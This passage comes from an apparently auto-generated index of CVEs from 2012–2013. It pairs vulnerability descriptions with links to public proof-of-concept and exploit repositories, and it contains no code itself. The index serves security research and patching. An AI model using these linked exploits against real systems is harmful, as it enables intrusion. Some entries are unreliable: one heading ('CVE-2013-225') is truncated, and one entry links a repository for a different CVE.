- [heroku/heroku-CVE-2013-0269](https://github.com/heroku/heroku-CVE-2013-0269)
- [danring/heroku-CVE-2013-0269](https://github.com/danring/heroku-CVE-2013-0269)
### CVE-2013-0303 (2014-03-23)
Unspecified vulnerability in core/ajax/translations.php in ownCloud before 4.0.12 and 4.5.x before 4.5.6 allows remote authenticated users to execute arbitrary PHP code via unknown vectors. NOTE: this entry has been SPLIT due to different affected versions. The core/settings.php issue is covered by CVE-2013-7344.
- [CiscoCXSecurity/ownCloud_RCE_CVE-2013-0303](https://github.com/CiscoCXSecurity/ownCloud_RCE_CVE-2013-0303)
### CVE-2013-0333 (2013-01-30)
lib/active_support/json/backends/yaml.rb in Ruby on Rails 2.3.x before 2.3.16 and 3.0.x before 3.0.20 does not properly convert JSON data to YAML data for processing by a YAML parser, which allows remote attackers to execute arbitrary code, conduct SQL injection attacks, or bypass authentication via crafted data that triggers unsafe decoding, a different vulnerability than CVE-2013-0156.
- [heroku/heroku-CVE-2013-0333](https://github.com/heroku/heroku-CVE-2013-0333)
### CVE-2013-225
- [PentestinGxRoot/ShellEvil](https://github.com/PentestinGxRoot/ShellEvil)
### CVE-2013-1081 (2013-03-11)
Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter.
- [steponequit/CVE-2013-1081](https://github.com/steponequit/CVE-2013-1081)
### CVE-2013-1300 (2013-07-10)
win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Allocation Vulnerability."
- [Meatballs1/cve-2013-1300](https://github.com/Meatballs1/cve-2013-1300)
### CVE-2013-1488 (2013-03-08)
The Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, and OpenJDK 6 and 7, allows remote attackers to execute arbitrary code via unspecified vectors involving reflection, Libraries, "improper toString calls," and the JDBC driver manager, as demonstrated by James Forshaw during a Pwn2Own competition at CanSecWest 2013.
- [v-p-b/buherablog-cve-2013-1488](https://github.com/v-p-b/buherablog-cve-2013-1488)
### CVE-2013-1491 (2013-03-08)
The Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, 5.0 Update 41 and earlier, and JavaFX 2.2.7 and earlier allows remote attackers to execute arbitrary code via vectors related to 2D, as demonstrated by Joshua Drake during a Pwn2Own competition at CanSecWest 2013.
- [guhe120/CVE20131491-JIT](https://github.com/guhe120/CVE20131491-JIT)
### CVE-2013-1690 (2013-06-26)
Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly handle onreadystatechange events in conjunction with page reloading, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site that triggers an attempt to execute data at an unmapped memory location.
- [vlad902/annotated-fbi-tbb-exploit](https://github.com/vlad902/annotated-fbi-tbb-exploit)
### CVE-2013-1763 (2013-02-28)
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
- [qkrtjsrbs315/CVE-2013-1763](https://github.com/qkrtjsrbs315/CVE-2013-1763)
### CVE-2013-1775 (2013-03-04)
sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows local users or physically proximate attackers to bypass intended time restrictions and retain privileges without re-authenticating by setting the system clock and sudo user timestamp to the epoch.
- [bekhzod0725/perl-CVE-2013-1775](https://github.com/bekhzod0725/perl-CVE-2013-1775)
### CVE-2013-1965 (2013-07-10)
Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
- [cinno/CVE-2013-1965](https://github.com/cinno/CVE-2013-1965)
### CVE-2013-2006 (2013-05-21)
OpenStack Identity (Keystone) Grizzly 2013.1.1, when DEBUG mode logging is enabled, logs the (1) admin_token and (2) LDAP password in plaintext, which allows local users to obtain sensitive by reading the log file.
- [LogSec/CVE-2013-2006](https://github.com/LogSec/CVE-2013-2006)
### CVE-2013-2028 (2013-07-18)
The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.
- [danghvu/nginx-1.4.0](https://github.com/danghvu/nginx-1.4.0)
- [kitctf/nginxpwn](https://github.com/kitctf/nginxpwn)
- [tachibana51/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC](https://github.com/tachibana51/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC)
- [m4drat/CVE-2013-2028-Exploit](https://github.com/m4drat/CVE-2013-2028-Exploit)
- [jptr218/nginxhack](https://github.com/jptr218/nginxhack)
- [Sunqiz/CVE-2013-2028-reproduction](https://github.com/Sunqiz/CVE-2013-2028-reproduction)
- [xiw1ll/CVE-2013-2028_Checker](https://github.com/xiw1ll/CVE-2013-2028_Checker)
### CVE-2013-2072 (2013-08-28)
Buffer overflow in the Python bindings for the xc_vcpu_setaffinity call in Xen 4.0.x, 4.1.x, and 4.2.x allows local administrators with permissions to configure VCPU affinity to cause a denial of service (memory corruption and xend toolstack crash) and possibly gain privileges via a crafted cpumap.
- [bl4ck5un/cve-2013-2072](https://github.com/bl4ck5un/cve-2013-2072)
### CVE-2013-2094 (2013-05-14)
The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.
- [realtalk/cve-2013-2094](https://github.com/realtalk/cve-2013-2094)
- [hiikezoe/libperf_event_exploit](https://github.com/hiikezoe/libperf_event_exploit)
- [Pashkela/CVE-2013-2094](https://github.com/Pashkela/CVE-2013-2094)
- [tarunyadav/fix-cve-2013-2094](https://github.com/tarunyadav/fix-cve-2013-2094)
- [timhsutw/cve-2013-2094](https://github.com/timhsutw/cve-2013-2094)
- [vnik5287/CVE-2013-2094](https://github.com/vnik5287/CVE-2013-2094)
### CVE-2013-2165 (2013-07-22)
ResourceBuilderImpl.java in the RichFaces 3.x through 5.x implementation in Red Hat JBoss Web Framework Kit before 2.3.0, Red Hat JBoss Web Platform through 5.2.0, Red Hat JBoss Enterprise Application Platform through 4.3.0 CP10 and 5.x through 5.2.0, Red Hat JBoss BRMS through 5.3.1, Red Hat JBoss SOA Platform through 4.3.0 CP05 and 5.x through 5.3.1, Red Hat JBoss Portal through 4.3 CP07 and 5.x through 5.2.2, and Red Hat JBoss Operations Network through 2.4.2 and 3.x through 3.1.2 does not restrict the classes for which deserialization methods can be called, which allows remote attackers to execute arbitrary code via crafted serialized data.
- [Pastea/CVE-2013-2165](https://github.com/Pastea/CVE-2013-2165)
### CVE-2013-2171 (2013-07-02)
The vm_map_lookup function in sys/vm/vm_map.c in the mmap implementation in the kernel in FreeBSD 9.0 through 9.1-RELEASE-p4 does not properly determine whether a task should have write access to a memory location, which allows local users to bypass filesystem write permissions and consequently gain privileges via a crafted application that leverages read permissions, and makes mmap and ptrace system calls.
- [0xGabe/FreeBSD-9.0-9.1-Privilege-Escalation](https://github.com/0xGabe/FreeBSD-9.0-9.1-Privilege-Escalation)
### CVE-2013-2186 (2013-10-28)
The DiskFileItem class in Apache Commons FileUpload, as used in Red Hat JBoss BRMS 5.3.1; JBoss Portal 4.3 CP07, 5.2.2, and 6.0.0; and Red Hat JBoss Web Server 1.0.2 allows remote attackers to write to arbitrary files via a NULL byte in a file name in a serialized instance.
- [GrrrDog/ACEDcup](https://github.com/GrrrDog/ACEDcup)
- [sa1g0n1337/Payload_CVE_2013_2186](https://github.com/sa1g0n1337/Payload_CVE_2013_2186)
- [sa1g0n1337/CVE_2013_2186](https://github.com/sa1g0n1337/CVE_2013_2186)
### CVE-2013-2217 (2013-09-23)
cache.py in Suds 0.4, when tempdir is set to None, allows local users to redirect SOAP queries and possibly have other unspecified impact via a symlink attack on a cache file with a predictable name in /tmp/suds/.
- [Osirium/suds](https://github.com/Osirium/suds)
### CVE-2013-2251 (2013-07-18)
Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
- [nth347/CVE-2013-2251](https://github.com/nth347/CVE-2013-2251)
### CVE-2013-2595 (2014-08-31)
The device-initialization functionality in the MSM camera driver for the Linux kernel 2.6.x and 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, enables MSM_CAM_IOCTL_SET_MEM_MAP_INFO ioctl calls for an unrestricted mmap interface, which allows attackers to gain privileges via a crafted application.
- [fi01/libmsm_cameraconfig_exploit](https://github.com/fi01/libmsm_cameraconfig_exploit)
### CVE-2013-2596 (2013-04-13)
Integer overflow in the fb_mmap function in drivers/video/fbmem.c in the Linux kernel before 3.8.9, as used in a certain Motorola build of Android 4.1.2 and other products, allows local users to create a read-write memory mapping for the entirety of kernel memory, and consequently gain privileges, via crafted /dev/graphics/fb0 mmap2 system calls, as demonstrated by the Motochopper pwn program.
- [hiikezoe/libfb_mem_exploit](https://github.com/hiikezoe/libfb_mem_exploit)
### CVE-2013-2597 (2014-08-31)
Stack-based buffer overflow in the acdb_ioctl function in audio_acdb.c in the acdb audio driver for the Linux kernel 2.6.x and 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to gain privileges via an application that leverages /dev/msm_acdb access and provides a large size value in an ioctl argument.
- [fi01/libmsm_acdb_exploit](https://github.com/fi01/libmsm_acdb_exploit)
### CVE-2013-2729 (2013-05-16)
Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-2727.
- [feliam/CVE-2013-2729](https://github.com/feliam/CVE-2013-2729)
### CVE-2013-2730 (2013-05-16)
Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-2733.
- [feliam/CVE-2013-2730](https://github.com/feliam/CVE-2013-2730)
### CVE-2013-2842 (2013-05-22)
Use-after-free vulnerability in Google Chrome before 27.0.1453.93 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the handling of widgets.
- [173210/spider](https://github.com/173210/spider)
### CVE-2013-2977 (2013-05-10)
Integer overflow in IBM Notes 8.5.x before 8.5.3 FP4 Interim Fix 1 and 9.x before 9.0 Interim Fix 1 on Windows, and 8.5.x before 8.5.3 FP5 and 9.x before 9.0.1 on Linux, allows remote attackers to execute arbitrary code via a malformed PNG image in a previewed e-mail message, aka SPR NPEI96K82Q.
- [defrancescojp/CVE-2013-2977](https://github.com/defrancescojp/CVE-2013-2977)
### CVE-2013-3214 (2020-01-28)
vtiger CRM 5.4.0 and earlier contain a PHP Code Injection Vulnerability in 'vtigerolservice.php'.
- [shadofren/CVE-2013-3214](https://github.com/shadofren/CVE-2013-3214)
### CVE-2013-3319 (2013-08-16)
The GetComputerSystem method in the HostControl service in SAP Netweaver 7.03 allows remote attackers to obtain sensitive information via a crafted SOAP request to TCP port 1128.
- [devoteam-cybertrust/cve-2013-3319](https://github.com/devoteam-cybertrust/cve-2013-3319)
### CVE-2013-3651 (2013-06-29)
LOCKON EC-CUBE 2.11.2 through 2.12.4 allows remote attackers to conduct unspecified PHP code-injection attacks via a crafted string, related to data/class/SC_CheckError.php and data/class/SC_FormParam.php.
- [motikan2010/CVE-2013-3651](https://github.com/motikan2010/CVE-2013-3651)
### CVE-2013-3660 (2013-05-24)
The EPATHOBJ::pprFlattenRec function in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 does not properly initialize a pointer for the next object in a certain list, which allows local users to obtain write access to the PATHRECORD chain, and consequently gain privileges, by triggering excessive consumption of paged memory and then making many FlattenPath function calls, aka "Win32k Read AV Vulnerability."
- [ExploitCN/CVE-2013-3660-x64-WIN7](https://github.com/ExploitCN/CVE-2013-3660-x64-WIN7)
### CVE-2013-3664 (2014-07-01)
Trimble SketchUp (formerly Google SketchUp) before 2013 (13.0.3689) allows remote attackers to execute arbitrary code via a crafted color palette table in a MAC Pict texture, which triggers an out-of-bounds stack write. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-3662. NOTE: this issue was SPLIT due to different affected products and codebases (ADT1); CVE-2013-7388 has been assigned to the paintlib issue.
- [defrancescojp/CVE-2013-3664_MAC](https://github.com/defrancescojp/CVE-2013-3664_MAC)
- [defrancescojp/CVE-2013-3664_BMP](https://github.com/defrancescojp/CVE-2013-3664_BMP)
### CVE-2013-3827 (2013-10-16)
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
- [thistehneisen/CVE-2013-3827](https://github.com/thistehneisen/CVE-2013-3827)
### CVE-2013-3900 (2013-12-11)
The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."
- [snoopopsec/vulnerability-CVE-2013-3900](https://github.com/snoopopsec/vulnerability-CVE-2013-3900)
- [CyberCondor/Fix-WinVerifyTrustSignatureValidationVuln](https://github.com/CyberCondor/Fix-WinVerifyTrustSignatureValidationVuln)
- [Securenetology/CVE-2013-3900](https://github.com/Securenetology/CVE-2013-3900)
- [OtisSymbos/CVE-2013-3900-WinTrustVerify](https://github.com/OtisSymbos/CVE-2013-3900-WinTrustVerify)
### CVE-2013-4002 (2013-07-23)
XMLscanner.java in Apache Xerces2 Java Parser before 2.12.0, as used in the Java Runtime Environment (JRE) in IBM Java 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 as well as Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, Java SE Embedded 7u40 and earlier, and possibly other products allows remote attackers to cause a denial of service via vectors related to XML attribute names.
- [tafamace/CVE-2013-4002](https://github.com/tafamace/CVE-2013-4002)
### CVE-2013-4175 (2020-01-23)
MySecureShell 1.31 has a Local Denial of Service Vulnerability
- [hartwork/mysecureshell-issues](https://github.com/hartwork/mysecureshell-issues)
### CVE-2013-4348 (2013-11-04)
The skb_flow_dissect function in net/core/flow_dissector.c in the Linux kernel through 3.12 allows remote attackers to cause a denial of service (infinite loop) via a small value in the IHL field of a packet with IPIP encapsulation.
- [bl4ck5un/cve-2013-4348](https://github.com/bl4ck5un/cve-2013-4348)
### CVE-2013-4362 (2013-09-30)
WEB-DAV Linux File System (davfs2) 1.4.6 and 1.4.7 allow local users to gain privileges via unknown attack vectors in (1) kernel_interface.c and (2) mount_davfs.c, related to the "system" function.
- [notclement/Automatic-davfs2-1.4.6-1.4.7-Local-Privilege-Escalation](https://github.com/notclement/Automatic-davfs2-1.4.6-1.4.7-Local-Privilege-Escalation)
### CVE-2013-4378 (2013-09-30)
Cross-site scripting (XSS) vulnerability in HtmlSessionInformationsReport.java in JavaMelody 1.46 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted X-Forwarded-For header.
- [theratpack/grails-javamelody-sample-app](https://github.com/theratpack/grails-javamelody-sample-app)
- [epicosy/VUL4J-50](https://github.com/epicosy/VUL4J-50)
### CVE-2013-4434 (2013-10-25)
Dropbear SSH Server before 2013.59 generates error messages for a failed logon attempt with different time delays depending on whether the user account exists, which allows remote attackers to discover valid usernames.
- [styx00/Dropbear_CVE-2013-4434](https://github.com/styx00/Dropbear_CVE-2013-4434)
### CVE-2013-4547 (2013-11-23)
nginx 0.8.41 through 1.4.3 and 1.5.x before 1.5.7 allows remote attackers to bypass intended restrictions via an unescaped space character in a URI.
- [cyberharsh/Nginx-CVE-2013-4547](https://github.com/cyberharsh/Nginx-CVE-2013-4547)
### CVE-2013-4710 (2014-03-03)
Android 3.0 through 4.1.x on Disney Mobile, eAccess, KDDI, NTT DOCOMO, SoftBank, and other devices does not properly implement the WebView class, which allows remote attackers to execute arbitrary methods of Java objects or cause a denial of service (reboot) via a crafted web page, as demonstrated by use of the WebView.addJavascriptInterface method, a related issue to CVE-2012-6636.
- [Snip3R69/CVE-2013-4710-WebView-RCE-Vulnerability](https://github.com/Snip3R69/CVE-2013-4710-WebView-RCE-Vulnerability)
### CVE-2013-4730 (2014-05-15)
Buffer overflow in PCMan's FTP Server 2.0.7 allows remote attackers to execute arbitrary code via a long string in a USER command.
- [t0rt3ll1n0/PCmanBoF](https://github.com/t0rt3ll1n0/PCmanBoF)
### CVE-2013-4784 (2013-07-08)
The HP Integrated Lights-Out (iLO) BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
- [alexoslabs/ipmitest](https://github.com/alexoslabs/ipmitest)
### CVE-2013-4786 (2013-07-08)
The IPMI 2.0 specification supports RMCP+ Authenticated Key-Exchange Protocol (RAKP) authentication, which allows remote attackers to obtain password hashes and conduct offline password guessing attacks by obtaining the HMAC from a RAKP message 2 response from a BMC.
- [fin3ss3g0d/CosmicRakp](https://github.com/fin3ss3g0d/CosmicRakp)
### CVE-2013-5065 (2013-11-27)
NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.
- [Friarfukd/RobbinHood](https://github.com/Friarfukd/RobbinHood)
### CVE-2013-5211 (2014-01-02)
The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.
- [dani87/ntpscanner](https://github.com/dani87/ntpscanner)
- [suedadam/ntpscanner](https://github.com/suedadam/ntpscanner)
- [sepehrdaddev/ntpdos](https://github.com/sepehrdaddev/ntpdos)
- [0xhav0c/CVE-2013-5211](https://github.com/0xhav0c/CVE-2013-5211)
- [requiempentest/-exploit-check-CVE-2013-5211](https://github.com/requiempentest/-exploit-check-CVE-2013-5211)
- [requiempentest/NTP_CVE-2013-5211](https://github.com/requiempentest/NTP_CVE-2013-5211)
### CVE-2013-5664 (2013-08-31)
Cross-site scripting (XSS) vulnerability in the web-based device-management API browser in Palo Alto Networks PAN-OS before 4.1.13 and 5.0.x before 5.0.6 allows remote attackers to inject arbitrary web script or HTML via crafted data, aka Ref ID 50908.
- [phusion/rails-cve-2012-5664-test](https://github.com/phusion/rails-cve-2012-5664-test)
### CVE-2013-5842 (2013-10-16)
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2013-5850.
- [guhe120/CVE-2013-5842](https://github.com/guhe120/CVE-2013-5842)
### CVE-2013-6117 (2014-07-11)
Dahua DVR 2.608.0000.0 and 2.608.GV00.0 allows remote attackers to bypass authentication and obtain sensitive information including user credentials, change user passwords, clear log files, and perform other actions via a request to TCP port 37777.
- [milo2012/CVE-2013-6117](https://github.com/milo2012/CVE-2013-6117)
### CVE-2013-6282 (2013-11-19)
The (1) get_user and (2) put_user API functions in the Linux kernel before 3.5.5 on the v6k and v7 ARM platforms do not validate certain addresses, which allows attackers to read or modify the contents of arbitrary kernel memory locations via a crafted application, as exploited in the wild against Android devices in October and November 2013.
- [fi01/libput_user_exploit](https://github.com/fi01/libput_user_exploit)
- [fi01/libget_user_exploit](https://github.com/fi01/libget_user_exploit)
- [jeboo/bypasslkm](https://github.com/jeboo/bypasslkm)
- [timwr/CVE-2013-6282](https://github.com/timwr/CVE-2013-6282)
### CVE-2013-6375 (2013-11-23)
Xen 4.2.x and 4.3.x, when using Intel VT-d for PCI passthrough, does not properly flush the TLB after clearing a present translation table entry, which allows local guest administrators to cause a denial of service or gain privileges via unspecified vectors related to an "inverted boolean parameter."
- [bl4ck5un/cve-2013-6375](https://github.com/bl4ck5un/cve-2013-6375)
### CVE-2013-6490 (2014-02-06)
The SIMPLE protocol functionality in Pidgin before 2.10.8 allows remote attackers to have an unspecified impact via a negative Content-Length header, which triggers a buffer overflow.
- [Everdoh/CVE-2013-6490](https://github.com/Everdoh/CVE-2013-6490)
### CVE-2013-6668 (2014-03-05)
Multiple unspecified vulnerabilities in Google V8 before 3.24.35.10, as used in Google Chrome before 33.0.1750.146, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
- [sdneon/CveTest](https://github.com/sdneon/CveTest)
### CVE-2013-6987 (2013-12-31)
Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/.
- [stoicboomer/CVE-2013-6987](https://github.com/stoicboomer/CVE-2013-6987)
## 2012
### CVE-2012-0002 (2012-03-13)
The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability."
- [zhangkaibin0921/MS12-020-CVE-2012-0002](https://github.com/zhangkaibin0921/MS12-020-CVE-2012-0002)
### CVE-2012-0003 (2012-01-10)
Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution Vulnerability."
- [k0keoyo/CVE-2012-0003_eXP](https://github.com/k0keoyo/CVE-2012-0003_eXP)
### CVE-2012-0056 (2012-01-27)
The mem_write function in the Linux kernel before 3.2.2, when ASLR is disabled, does not properly check permissions when writing to /proc/<pid>/mem, which allows local users to gain privileges by modifying process memory, as demonstrated by Mempodipper.
- [srclib/CVE-2012-0056](https://github.com/srclib/CVE-2012-0056)
- [pythonone/CVE-2012-0056](https://github.com/pythonone/CVE-2012-0056)
### CVE-2012-0152 (2012-03-13)
The Remote Desktop Protocol (RDP) service in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (application hang) via a series of crafted packets, aka "Terminal Server Denial of Service Vulnerability."
- [rutvijjethwa/RDP_jammer](https://github.com/rutvijjethwa/RDP_jammer)
### CVE-2012-0158 (2012-04-10)
The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability."
- [RobertoLeonFR-ES/Exploit-Win32.CVE-2012-0158.F.doc](https://github.com/RobertoLeonFR-ES/Exploit-Win32.CVE-2012-0158.F.doc)
- [Sunqiz/CVE-2012-0158-reproduction](https://github.com/Sunqiz/CVE-2012-0158-reproduction)
### CVE-2012-1495 (2020-01-27)
install/index.php in WebCalendar before 1.2.5 allows remote attackers to execute arbitrary code via the form_single_user_login parameter.
- [axelbankole/CVE-2012-1495-Webcalendar-](https://github.com/axelbankole/CVE-2012-1495-Webcalendar-)
### CVE-2012-1675 (2012-05-08)
The TNS Listener, as used in Oracle Database 11g 11.1.0.7, 11.2.0.2, and 11.2.0.3, and 10g 10.2.0.3, 10.2.0.4, and 10.2.0.5, as used in Oracle Fusion Middleware, Enterprise Manager, E-Business Suite, and possibly other products, allows remote attackers to execute arbitrary database commands by performing a remote registration of a database (1) instance or (2) service name that already exists, then conducting a man-in-the-middle (MITM) attack to hijack database connections, aka "TNS Poison."
- [bongbongco/CVE-2012-1675](https://github.com/bongbongco/CVE-2012-1675)
### CVE-2012-1723 (2012-06-16)
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
- [EthanNJC/CVE-2012-1723](https://github.com/EthanNJC/CVE-2012-1723)
### CVE-2012-1823 (2012-05-11)
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
- [drone789/CVE-2012-1823](https://github.com/drone789/CVE-2012-1823)
- [tardummy01/oscp_scripts-1](https://github.com/tardummy01/oscp_scripts-1)
- [Unix13/metasploitable2](https://github.com/Unix13/metasploitable2)
- [cyberharsh/PHP_CVE-2012-1823](https://github.com/cyberharsh/PHP_CVE-2012-1823)
- [0xl0k1/CVE-2012-1823](https://github.com/0xl0k1/CVE-2012-1823)
### CVE-2012-1870 (2012-07-10)
The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products, allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS server and sniffing the network during the resulting HTTPS session, aka "TLS Protocol Vulnerability."
- [dja2TaqkGEEfA45/CVE-2012-1870](https://github.com/dja2TaqkGEEfA45/CVE-2012-1870)
### CVE-2012-1876 (2012-06-12)
Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access a nonexistent object, leading to a heap-based buffer overflow, aka "Col Element Remote Code Execution Vulnerability," as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012.
- [WizardVan/CVE-2012-1876](https://github.com/WizardVan/CVE-2012-1876)
- [ExploitCN/CVE-2012-1876-win7_x86_and_win7x64](https://github.com/ExploitCN/CVE-2012-1876-win7_x86_and_win7x64)
### CVE-2012-1889 (2012-06-13)
Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.
- [whu-enjoy/CVE-2012-1889](https://github.com/whu-enjoy/CVE-2012-1889)
- [l-iberty/cve-2012-1889](https://github.com/l-iberty/cve-2012-1889)
### CVE-2012-2122 (2012-06-26)
sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
- [Avinza/CVE-2012-2122-scanner](https://github.com/Avinza/CVE-2012-2122-scanner)
- [cyberharsh/Oracle-mysql-CVE-2012-2122](https://github.com/cyberharsh/Oracle-mysql-CVE-2012-2122)
- [zhangkaibin0921/CVE-2012-2122](https://github.com/zhangkaibin0921/CVE-2012-2122)
### CVE-2012-2593 (2020-02-06)
Cross-site scripting (XSS) vulnerability in the administrative interface in Atmail Webmail Server 6.4 allows remote attackers to inject arbitrary web script or HTML via the Date field of an email.
- [AndrewTrube/CVE-2012-2593](https://github.com/AndrewTrube/CVE-2012-2593)
### CVE-2012-2661 (2012-06-22)
The Active Record component in Ruby on Rails 3.0.x before 3.0.13, 3.1.x before 3.1.5, and 3.2.x before 3.2.4 does not properly implement the passing of request data to a where method in an ActiveRecord class, which allows remote attackers to conduct certain SQL injection attacks via nested query parameters that leverage unintended recursion, a related issue to CVE-2012-2695.
- [r4x0r1337/-CVE-2012-2661-ActiveRecord-SQL-injection-](https://github.com/r4x0r1337/-CVE-2012-2661-ActiveRecord-SQL-injection-)
